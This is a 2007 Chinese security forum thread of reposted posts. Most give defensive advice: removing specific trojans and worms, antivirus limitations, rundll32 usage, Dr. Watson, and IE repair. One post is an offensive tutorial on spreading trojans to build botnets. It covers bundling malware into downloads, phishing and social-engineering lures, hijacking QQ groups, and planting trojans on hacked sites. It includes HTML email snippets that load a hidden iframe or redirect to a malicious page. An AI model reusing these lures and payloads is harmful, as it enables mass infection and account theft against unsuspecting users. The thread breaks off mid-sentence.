　　症状：瑞星文件监控或主程序检测到Trojan.DL.Agent.apb，病毒文件路径C:\Document and Settings\All Users\Application Data\Microsoft\IEHelper\IEHelper*.dll（其中的*代表文件名变化的部分），状态为“重新启动计算机后删除”，但重启计算机后，病毒仍然存在。

　　
提示：本篇知识库仅适用于病毒文件保存在NTFS分区的情况；
如果病毒文件在FAT分区的话，请启动计算机，按F8键到安全模式下手动删除。

解决方案：

如果您的操作系统是Windows 2000：

步骤1、把病毒文件IEHelper*.dll剪切到其他目录，下面以剪切到桌面为例；

步骤2、右键点击病毒文件IEHelper*.dll，在菜单中选择“属性”

步骤3、在“安全”标签页中，取消勾选“允许来自父系的可继承权限传播给该对象”，点击“确定”。然后逐一选择名称列表中的用户，点击“删除”按钮，直至删除所有用户。

步骤4、点击“安全”标签页中“添加”按钮，在“选择用户或组”中，选择添加“Everyone”，点击“确定”；

步骤5、在“安全”标签页中，Everyone针对该文件的所有权限全部勾选“允许”，点击“确定”；
步骤6、删除桌面上的病毒文件IEHelper*.dll，并清空回收站
如果您的操作系统是Windows XP：

步骤1、打开病毒文件所在路径（通常情况下路径为C:\Documents and Settings\All Users\Application Data\Microsoft\IEHelper）（如图）

步骤2、删除相应文件，但针对IEHelper*.dll文件可能出现删除失败的情况（如图）

步骤3、当出现IEHelper*.dll文件无法删除时，在文件所在处点击右键选择“属性”。

步骤4、切换到文件属性的“安全”页面，并点击“高级”按钮

步骤5、切换到“权限”页面，并取消勾选“从父项继承那些可以应用到子对象的权限项目，包括那些在此明确定义的项目”选项，并在弹出的提示框中点击“删除”按钮。

步骤5、切换到“权限”页面，点击“添加”按钮，并将Everyone的“完全控制”权限赋予该文件。

步骤6、设置正确后的文件权限将显示如下图，请点击“确定”后保存。

步骤7、再次删除该文件，并清空回收站

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

24^# 大中小发表于 2007-3-7 03:08 只看该作者

病毒和杀毒软件间的斗争从其产生之日开始就从未停止，从捉迷藏游戏到病毒破坏安全软件运行，阻止用户访问安全网站等技术都已经不新鲜了。回顾这些年的安全事件，可以验证一句话：曾经看似不可侵犯的原则在今天看来则是错误的，而今天看似神圣的原则明天也将遭到反对，不断变化这一原则也许是唯一的永恒真理。目前很多企业用户乃至家庭用户安全意识日渐提高，这也是在很多血淋淋教训下的进化结果。目前每次大规模的病毒爆发造成的直接损失以数千万美元计量，间接损失更是无法估算。目前就是连电视广播这样的传统媒体也频频报道病毒相关的事情，可见病毒离我们很近。认知过程就是这样的循序渐进，就连皮特.诺顿（著名的诺顿公司的创始人），曾经就宣称电脑病毒是不存在的，象纽约下水道的鳄鱼一样荒谬（不过具有讽刺意味的是，诺顿的公司仍然在数年以后推出了自己的杀毒软件，而且相当成功）。目前大多数人防御病毒和入侵的手段往往依靠杀毒软件或者安全软件，但是单纯靠这些软件就可以应付我们所面临的种种危机吗？

我们先来看看这篇稿子里涉及的病毒的相关资料：病毒命名：Backdoor.Win32.Small.gl [Kaspersky Lab]， Virus.Win32.Tenga.a [Kaspersky Lab]， BackDoor-CTM [McAfee]， W32/Gael.worm.a [McAfee]， W32/Tenga-A [Sophos]， PE_TENGA.A [Trend Micro]。大家看见卡巴基斯命名了两个名称，这也反映出卡巴基斯杀毒软件对该病毒的认识过程：这个病毒带有两个完整且独立的病毒体。

这个病毒在2005年5月13日出现第一个版本，5月18日出现B变种，5月22日出现C变种，每隔几天就出现新的变种之所以这么说，这里我们用卡巴基斯的命名方式称这个病毒为Win32.Tenga，这是一个比较有代表性的病毒，代表目前病毒的技术趋势。因为这个病毒的传播途径有两条：第一条：exe感染，这一条可以定义该病毒的类型： TYPE ：Virus，当病毒文件运行，病毒体搜索本地文件系统中的EXE文件，把病毒代码插入exe文件，实现感染，当EXE文件被感染后，EXE文件增大3072Bytes。Win32.Tenga传播的第二条途径：Microsoft Security Bulletin MS03-026).，Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability这个漏洞大家很眼熟吧，此漏洞被很多3星乃至4星病毒利用，至今仍广为流行，也被很多喜欢入侵的朋友利用。病毒会开启10个线程，发送SYN PACKETS到随机的IP地址的TCP139端口。寻找带MS03-026漏洞的可感染机器，试图连接有响应的机器通过IPC$和共享驱动器。从这一条它又可以定义病毒子类型：SUBTYPE ：WORM.。从这点我们可以看出，目前互联网上存在很多无辜的被动受害者，网络中再也不是“我不运行病毒文件就不会感染病毒“的乐土，不会采取措施保护自己的人在网络中只会身处险境。无论以上那种渠道成功，感染后会从于“http ：//XXXX(在此不给出).lycos.it“下载3个文件：DL.EXE，GAELICUM.EXE （ 5.00 KB，带有Win32.Tenga.a病毒体），CBACK.EXE （13.0 KB，带有新型远程浏览木马： BackDoor-CTM）。单一型病毒不是主流病毒技术的趋势，混合型病毒才是大势所趋，这也是病毒的bot战略大行其道的原因。万事都是辩证的，功能复杂的病毒体往往体积也会很大，病毒体积过大会不易隐藏和传播，所以主流思想是不同病毒体负责不同模块功能，模块化的思路在病毒创作中同样适用，所以现在经常看到不同病毒巧妙结合在一起，交叉感染，这让毒软件处理起来比较麻烦。北京几年前曾出现一次nimda.e感染一个2000台机器的网吧，处理起来很麻烦其中原因之一就是存在混合感染。

我们来测试一下杀毒软件对Win32.Tenga的处理能力：首先说一下诺顿的处理结果：诺顿处理Win32.Tenga.a这个病毒存在问题，最新毒库的诺顿可以检测到病毒，但在安全模式下查杀的不干净，杀毒后仍反复感染，并且处理后的exe文件头对齐失误，很多exe文件在杀毒后不能使用了（这个问题已经反映给诺顿了），卡巴基斯的最新病毒库可以查杀这个病毒，能过清除病毒，不够清除病毒后也存在exe不能使用，原因和诺顿一样文件头对齐问题。以下是一个正常Win32.Tenga.a样本测试界面：，处理方法有：清除，删除，忽略三个选项，

我们把Win32.Tenga.a病毒主和副特征码删除，（由于涉及内容较多，关于修改病毒特征码，不是本文论述内容），卡巴基斯仍然可以检测到，因为卡巴基斯检测病毒除了特征码外还采取一些行为判定等技术，这也就是很多杀毒软件公司所说的查杀未知病毒的技术。这时的选项有3个，隔离，删除，忽略三个选项，

仔细观察修改特征码后的Win32.Tenga.a和没有修改的两种情况，卡巴基斯杀毒软件处理结果如下：

1．当找对病毒特征码，算法正确后可以图一，有清除，删除和忽略3个选项，只要用户在杀毒规则里选择卡巴基斯推荐的清除选项就可以杀掉病毒。

2．当病毒特征代码被修改后，卡巴基斯只能出判断为TYPE.WIN32病毒，处理结果有3种方法：隔离，删除，忽略，表面上实现了查杀未知病毒能力，但由于这是一个EXE病毒，那么除了感染用户的常规应用软件的执行程序文件外，还感染系统盘下的系统文件，当感染系统文件后，如果选择忽略，那么相当于没有杀毒，显然不行。只剩2个选项可选择，无论选择隔离或者删除，被感染系统文件夹下的EXE文件都会丢失，下次系统启动由于系统文件丢失会导致启动失败。在目前的Win32.Tenga变种感染中，有几个杀毒软件处理后很多受害者杀毒后系统重启到输入windows登陆密码对话框后，输入登陆密码后自动注销，不能进入系统，这就是由于Win32.Tenga感染系统目录下的USERINIT.EXE文件，这个文件是负责登陆后的初始化用户环境的，由于该文件染Win32.Tenga.病毒后，被杀毒软件删除或者隔离，没有这个文件用户不能登陆初始化，造成反复注销。这样，反而是由于杀毒软件杀毒原因造成用户损失。目前这一变种已经发给卡巴基斯

这个例子反映出来的问题只是冰山一角，类似由于杀毒软引起的问题还非常多，如国内好几款杀毒软件处理POLYBOOT病毒时，由于这个病毒是一个引导型病毒，杀毒软件会清空主引导扇区内的数据，造成分区丢失，这一问题目前仍然没有解决。还有几个EXE病毒，杀毒软件在杀毒后文件头对齐存在问题，病毒是杀掉了，可文件也不好用了。

每天都有大量新的病毒如洪水般出现在我们面前，单纯靠杀毒软件防御潜在的危险是远远不够的，毕竟目前的杀毒软件还处于被动状态，只有当病毒出现后，杀毒软件才会升级更新。目前许多病毒都开放了代码，如著名的beagle，agobot，netsky等，在这个空前自由的互联网中，得到代码的人简单的修改就会令一个成熟且颇具威力的病毒出现，单单依靠杀毒软件是不足以处理我们面对危机的，只有全社会动员起来，学习安全知识，加强安全观念才是最有效的方法。广播，杂志等媒体也多了一份促进安全知识交互的使命。作为个人，多接触安全方面知识，把自己的知识始终跟上目前的安全需要才是最有效的方法。天道酬勤，随着知识的积累，相信你处理各种病毒和安全问题一定会游刃有余。

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

25^# 大中小发表于 2007-3-7 03:08 只看该作者

如今网络上病毒肆虐，让电脑用户在应付病毒上花费了不少精力。当你使用杀毒软件查杀病毒时，是否遇到查出了病毒，但是杀不掉的情况，原因何在?该如何处理呢?以下笔者对此略作介绍。

●系统还原文件

_restore文件夹是Windows Me/XP系统特有的系统还原文件夹，隐藏在该文件夹中的病毒是不能直接清除的。当然这些病毒也不能直接发挥作用。要清除这些病毒，可以关闭Windows系统的“系统还原”功能，清理系统还原点，或者直接删除_restore文件夹的内容。

●疑似电脑病毒

有时杀毒软件会出现提示：unknown.com.tsr.virus。该提示中，unknown是“不明的”意思，tsr是内存驻留的意思，本信息一般提示的是纯DOS环境下的可执行文件，表明杀毒软件在该文件中发现了可疑代码，类似病毒，但是没有确定是什么病毒。

如果疑似病毒提示涉及Type-Win32代码，则表示可疑的32位代码的意思，是指Windows环境下可疑的可执行代码。对于疑似病毒，可以直接删除该文件，或者将这些“疑似”的病毒文件发送给反病毒软件公司，请求帮助。

●ex_文件感染病毒

以.ex_为扩展名称的文件是软件安装程序的部分文件，其中的病毒不能直接清除。只有在软件完全安装成功后，方可清除。这有点类似于在COPY文件时发现了病毒的处理方法。

●在DOS下清除病毒

对于在引导区发现的病毒，如POLYBOOT/WYX.b病毒，请使用干净的系统盘启动系统到DOS，然后在DOS下杀毒即可清除。如果可感染引导区的病毒存在于文件中，可以直接删除该文件。

●系统初始文件中引用病毒

杀毒时出现如下提示：

　　C：\Windows\brasil.pif worm.win32.opasoft.a病毒　已删除
　　C：\Windows\instit.bat worm.win32.opasoft.a病毒　已删除
　　C：\Windows\alevir.exe worm.win32.opasoft.a病毒　已删除
　　C：\Windows\marco.scr worm.win32.opasoft.a病毒　已删除
　　C：\Windows\SCRSVR.exe worm.win32.opasoft.a病毒　已删除

杀毒后，重启动电脑时出现很多找不到文件的信息，而且再次杀毒时提示依旧，病毒还是存在。这些顽固病毒的引用应该是在win.ini文件中，请单击“开始→运行”，键入“sysedit”，按下回车键，编辑win.ini，删除对病毒的引用行。

●病毒最新变种

杀毒软件查出的是其病毒库中不存在的新型病毒，请将杀毒软件的病毒库升级到最新，然后再查杀。

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

26^# 大中小发表于 2007-3-7 03:09 只看该作者

最近安装了最新版的卡巴6，发现有时卡巴会自动关闭。开始认为是系统出现了问题。没想到最近我的几个朋友家里的卡巴也出现了同样毛病。可见，这个问题是很有共性的。

　　为了解决这个问题，我在N多的论坛中狂找结局方法，终于找到了造成卡巴关闭的罪魁祸首。如果你也用的是卡巴斯基6的话，用以下方法肯定有效。

　　导致卡巴斯基6.0莫名退出的原因原来是c:\windows\system32\drwtsn32.exe（华生医生）程序，它企图对卡巴有两个攻击动作被截它靠敏锐捕捉到了。

　　1.drwstsn32.exe　它企图写入卡巴的memory
　　2.drwstsn32.exe　它企图jnjects own code into卡巴

　　Dr. Watson （华生医生）是每当发生系统错误时对系统拍取快照的诊断工具。该工具可截获软件错误，识别发生错误的软件并提供详细的原因说明。Dr. Watson （华生医生）可以经常诊断问题并提供建议性的操作过程。您与 Microsoft公司技术支持联系时，Dr. Watson （华生医生）是可帮助您评估问题的工具。

　　华生医生，是自带的查错软件，可以说是完全没有必要的东东。

　　现在几乎每个人另都装杀毒软件的，而且华生只查不杀，只写日志报告，有耗资源。

　　建议大家关掉它：

　　(1)开始→运行“regedit”，然后在注册表：[HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows NT \CurrentVersion \AeDebug]，中将“auto”的值改为0即可。

　　(2)运行"中输入"drwtsn32"命令，或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson"，调出系统里的华医生Dr.Watson ，只保留"转储全部线程上下文"选项，否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找user.dmp文件，删除了它。这样就可以停用华医生了。

　　以上方法是常规的,应该都有效，再不行的话，进安全模式删了它。

　　注：新版卡巴斯基6.0已经解决了这个问题，大家如果嫌以上步骤麻烦，可更新新版卡巴斯基

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

27^# 大中小发表于 2007-3-7 03:09 只看该作者

Rundll32介绍和使用方法

动态链接库函数启动器——Rundll32

经常听到有些朋友说:呀！系统的注册表启动项目有rundll32.exe，系统进程也有rundll32.exe，是不是病毒呀？其实，这是对rundll32.exe接口不了解，它的原理非常简单，了解并掌握其原理对于我们平时的应用非常有用，如果能理解了原理，我们就能活学活用，自己挖掘DLL参数应用技巧。

Rundll32.exe和Rundll.exe的区别

所谓Rundll.exe，可以把它分成两部分，Run(运行)和DLL(动态数据库)，所以，此程序的功能是运行那些不能作为程序单独运行的DLL文件。而Rundll32.exe则用来运行32位DLL文件。Windows 2000/XP都是NT内核系统，其代码都是纯32位的，所以在这两个系统中，就没有rundll.exe这个程序。

相反，Windows 98代码夹杂着16位和32位，所以同时具有Rundll32.exe和Rundll.exe两个程序。这就是为什么Windows 98的System文件夹为主系统文件夹，而到了Windows 2000/XP时就变成System32为主系统文件夹(这时的System文件夹是为兼容16位代码设立的)。

Rundll.exe是病毒？

无论是Rundll32.exe或Rundll.exe，独立运行都是毫无作用的，要在程序后面指定加载DLL文件。在Windows的任务管理器中，我们只能看到rundll32.exe进程，而其实质是调用的DLL。我们可以利用进程管理器等软件（本刊2004年21期有介绍）来查看它具体运行了哪些DLL文件。

有些木马是利用Rundll32.exe加载DLL形式运行的，但大多数情况下Rundll32.exe都是加载系统的DLL文件，不用太担心。另外要提起的是，有些病毒木马利用名字与系统常见进程相似或相同特点，瞒骗用户。所以,要确定所运行的Rundll32.exe是在%systemroot%system32目录下的，注意文件名称也没有变化。

相信大家在论坛上很常看见那些高手给出的一些参数来简化操作，如rundll32.exe shell32.dll，Control_RunDLL，取代了冗长的“开始→设置→控制面板”，作为菜鸟的我们心里一定痒痒的。他们是怎么知道答案的？我们如何自己找到答案？分析上面命令可以知道，其实就是运行Rundll32.exe程序，指定它加载shell32.dll文件，而逗号后面的则是这个DLL的参数。了解了其原理，下面就可以自己挖掘出很多平时罕为人知的参数了。

第一步：运行eXeScope软件，打开一个某个DLL文件，例如shell32.dll。

第二步：选择“导出→SHELL32.DLL”，在右边窗口就可以看到此DLL文件的参数了。

第三步：这些参数的作用一般可以从字面上得知，所以不用专业知识。要注意的是，参数是区分大小写的，在运行时一定要正确输入，否则会出错。现在随便找一个参数，例如RestartDialog，从字面上理解应该是重启对话框。组合成一个命令，就是Rundll32.exe shell32.dll，RestartDialog ，运行后可以看见平时熟悉的Windows重启对话框。

现在，我们已经学会了利用反编译软件来获取DLL文件中的参数，所以以后看到别人的一个命令，可以从调用的DLL文件中获取更多的命令。自己摸索，你就能了解更多调用DLL文件的参数了。

小资料

常用的rundll32参数

命令: rundll32.exe shell32.dll,Control_RunDLL

功能: 显示控制面板

命令: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1

功能: 显示“控制面板→辅助选项→键盘”

命令: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1

功能: 执行“控制面板→添加新硬件”

命令: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter

功能: 执行“控制面板→添加新打印机”

命令：rundll32.exe DISKCOPY.DLL,DiskCopyRunDll

功能：启动软盘复制窗口

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

28^# 大中小发表于 2007-3-7 03:09 只看该作者

近日，江民反病毒中心监测到，“威金”病毒(Worm/Viking)的多个新变种在互联网上活动较为频繁，

已有多家企业用户报告感染了该病毒并导致整个局域网受到不同程度的破坏。

据江民全国病毒疫情监控系统数据显示，该病毒目前已有188个变种，

从2005年5月19日首次出现至今，已经感染了15万余台计算机。

　　江民反病毒专家分析，“威金”病毒主要通过网络共享传播，

病毒会感染电脑中所有的.EXE可执行文件，传播速度十分迅速。

“威金”病毒运行后，修改注册表自启动项，以使自己随系统一起运行，

向系统文件目录下生成以下病毒文件：

　　Program Files\svhost32.exe
　　Program Files\micorsoft\svhost32.exe
　　windows\explorer.exe
　　windows\logo1_exe
　　windows\rundll32.exe
　　windows\rundl132.exe
　　windows\intel\rundl132.exe
　　windows\dll.dll

　　病毒新变种还会自动从网站下载“天堂杀手”以及“QQ大盗（QQpass）”等10余种木马病毒，

企图盗取包括天堂、征途、梦幻西游、传奇等多种流行网游以及QQ的帐号、密码。

　　针对该病毒以及最新变种，请及时升级病毒库，

用户可以使用最新版杀毒软件对电脑进行全盘查杀，即可消除病毒威胁。

　　反病毒专家特别提醒，对于局域网用户，在杀毒时务必断开网络，

以免病毒在局域网流窜，导致病毒屡杀不绝的现象。

单机用户应检查自己的电脑是否存在共享（可使用江民杀毒软件木马一扫光中“共享管理”功能查看），

在全盘杀毒后及时关闭所有共享设置，以免再遭病毒侵扰。

　　未安装杀毒软件的用户可以免费下载使用威金病毒专杀工具彻底抵御“威金”病毒|

`
`
` 恢复威金病毒感染的EXE文件小方法

首先我们使用杀毒软件以及专杀工具查杀威金病毒，
但千万要注意的是，对于感染的.exe文件不要选择删除，隔离即可。
　　然后，在Windows
目录下建立一个空文件，
文件名为logo1_.exe，
文件属性设置成“只读、隐藏、系统属性”。
按照此方法，还需建立rundl123.exe、logo_1.exe以及Sy0.exe~Sy9.exe等文件。

　　接着，拔掉网线，断开网络，暂时关闭病毒防护。还原被隔离的.exe文件，点击运行。这时被感染的.exe文件就会脱壳，logo1_.exe以及rundl123.exe等会被释放。用最新的专杀对这个.exe文件检测一遍，然后把它放入RAR压缩包里。在RAR中的.exe文件不会感染，在RAR中运行这个程序也没问题。
　　注意，在使用超级兔子等软件时一定不能清理自己创建的那几个文件。否则，病毒将再次开始活动。
　　最后，再次全面查杀，保证内部无毒。

　　此方法，只推荐给专业人士参考，不要轻易操作，以免发生严重后果！

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

29^# 大中小发表于 2007-3-7 03:10 只看该作者

一.目前流行木马传播技术.

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

<body onload="window.location='你的网页木马地址';"> </body>

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。
　
首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑，肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：

</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"

frameborder="0">

对方只要一打开，就会中我们的网页木马。

这里发送邮件时注意一些技巧，我们要加入一些社会工程会。比如对方是爱好车的，

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个，让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。

这里要用到论坛邮箱提取器，这类工具黑鹰也有下载，大家可以找一下。提取大量

邮箱后，配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗

这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

二.新型高级木马传播技术

下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件

这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马

其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

好了,教程就到这里,应该相当全面了.这些高级技术, 有兴趣的可以研究一下,相信

一定会有收获.

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

30^# 大中小发表于 2007-3-7 03:10 只看该作者

一、感染了病毒所致

这种情况往往表现在打开IE时，在IE界面的左下框里提示：正在打开网页，但老半天没响应。在任务管理器里查看进程，（进入方法，把鼠标放在任务栏上，按右键—任务管理器—进程）看看CPU的占用率如何，如果是100%，可以肯定，是感染了病毒，这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源。

找到后，最好把名称记录下来，然后点击结束，如果不能结束，则要启动到安全模式下把该东东删除，还要进入注册表里，（方法：开始—运行，输入regedit）在注册表对话框里，点编辑—查找，输入那个程序名，找到后，点鼠标右键删除，然后再进行几次的搜索，往往能彻底删除干净。

有很多的病毒，杀毒软件无能为力时，唯一的方法就是手动删除。

二、与设置代理服务器有关

有些筒子，出于某些方面考虑，在浏览器里设置了代理服务器（控制面板--Internet选项—连接—局域网设置—为LAN使用代理服务器），设置代理服务器是不影响QQ联网的，因为QQ用的是4000端口，而访问互联网使用的是80或8080端口。这就是很多的筒子们不明白为什么QQ能上，而网页不能打开的原因。而代理服务器一般不是很稳定，有时侯能上，有时候不能上。如果有这样设置的，请把代理取消就可以了。

三、DNS服务器解释出错

所谓DNS，即域名服务器（Domain Name Server）,它把域名转换成计算机能够识别的IP地址，如深圳之窗（www.sz.net.cn）对应的IP地址是219.133.46.54，深圳热线（www.szonline.net）对应的IP地址是202.96.154.6。如果DNS服务器出错，则无法进行域名解释，自然不能上网了。
如果是这种情况，有时候是网络服务接入商即ISP的问题，可打电话咨询ISP；有时候则是路由器或网卡的问题，无法与ISP的DNS服务连接。

这种情况的话，可把路由器关一会再开，或者重新设置路由器。或者是网卡无法自动搜寻到DNS的服务器地址，可以尝试用指定的DNS服务器地址。在网络的属性里进行，（控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址）。不同的ISP有不同的DNS地址，如电信常用的是202.96.134.133(主用) 202.96.128.68（备用）。

更新网卡的驱动程序或更换网卡也不失为一个思路。
四、系统文件丢失导致IE不能正常启动

这种现象颇为常见，由于：

1、系统的不稳定表现为死机频繁、经常莫名重启、非法关机造成系统文件丢失；

2、软硬件的冲突常表现为安装了某些程序引起网卡驱动的冲突或与IE的冲突。自从INTEL推出超线程CPU后，有一个突出的问题是XP SP1下的IE6与超线程产生冲突；

3、病毒的侵扰导致系统文件损坏或丢失。

如果是第一种情况，可尝试修复系统，2K或XP系统下，放入原安装光盘（注意：一定要原安装光盘），在开始—运行里输入sfc /scanow，按回车。98的系统也可以用sfc命令进行检查。

如果是第二种情况，可以把最近安装的硬件或程序卸载，2K或XP的系统可以在机器启动后，长按F8，进入启动菜单，选择“最后一次正确的配置”，若是XP系统，还可以利用系统的还原功能，一般能很快解决问题。

如果是XP的系统因超线程CPU的原因，可以在BIOS里禁用超线程，或升级到SP2。（当然，XP如何升级SP2涉及到很多知识及要注意的问题，在此限于篇幅不再详述）。这种情况下，QQ里自带的TT浏览器一般能正常浏览，可改用一试。

如果是第三种情况，则要对系统盘进行全面的查杀病毒。

还有一种现象也需特别留意：就是能打开网站的首页，但不能打开二级链接，如果是这样，处理的方法是重新注册如下的DLL文件：

在开始—运行里输入：
regsvr32 Shdocvw.dll
regsvr32 Shell32.dll　（注意这个命令，先不用输）
regsvr32 Oleaut32.dll
regsvr32 Actxprxy.dll
regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll

注意：每输入一条，按回车。第二个命令可以先不用输，输完这些命令后重新启动windows，如果发现无效，再重新输入一遍，这次输入第二个命令。还有，如果是98的系统，到微软的网站上下载这个文件也许更简单，这个文件的下载地址是：
http://download.microsoft.com/download/msn...us/mcrepair.exe

五、IE损坏

以上方法若果都不奏效，有可能是IE的内核损坏，虽经系统修复，亦无法弥补，那么重装IE就是最好的方法了。

如果是98或2K系统，IE的版本若是5.0，建议升级到6.0。

98的系统如果已经升级安装了6.0，那么在控制面�